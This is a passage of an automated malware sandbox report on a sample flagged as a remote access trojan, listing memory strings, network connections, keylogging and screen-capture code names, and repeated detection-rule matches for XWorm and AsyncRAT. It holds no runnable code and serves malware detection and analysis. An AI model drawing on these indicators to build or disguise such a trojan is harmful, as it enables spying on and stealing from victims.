SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114270198.000000000096D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114293805.0000000000977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.8:49682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49683 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49685 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49692 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D51B00_2_002D51B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D32400_2_002D3240
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002E63F00_2_002E63F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002DE4600_2_002DE460
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002EC65A0_2_002EC65A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002E67500_2_002E6750
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D67A00_2_002D67A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002DC8E70_2_002DC8E7
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD51B02_2_00CD51B0
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD32402_2_00CD3240
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CE63F02_2_00CE63F0
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CDE4602_2_00CDE460
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CEC65A2_2_00CEC65A
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD67A02_2_00CD67A0
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CE67502_2_00CE6750
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CDC8E72_2_00CDC8E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_053173C83_2_053173C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05317F483_2_05317F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_053169F03_2_053169F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_053164A03_2_053164A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05318AB03_2_05318AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674F6C83_2_0674F6C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06746AE03_2_06746AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_067483B03_2_067483B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674B3B03_2_0674B3B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_067422683_2_06742268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B200E03_2_07B200E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B29ED83_2_07B29ED8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B200D23_2_07B200D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B29EC93_2_07B29EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B2C8BA3_2_07B2C8BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07BF04D03_2_07BF04D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07BF04C03_2_07BF04C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07BF00403_2_07BF0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B2C8C83_2_07B2C8C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: String function: 002D5600 appears 55 times
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: String function: 00CD5600 appears 55 times
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
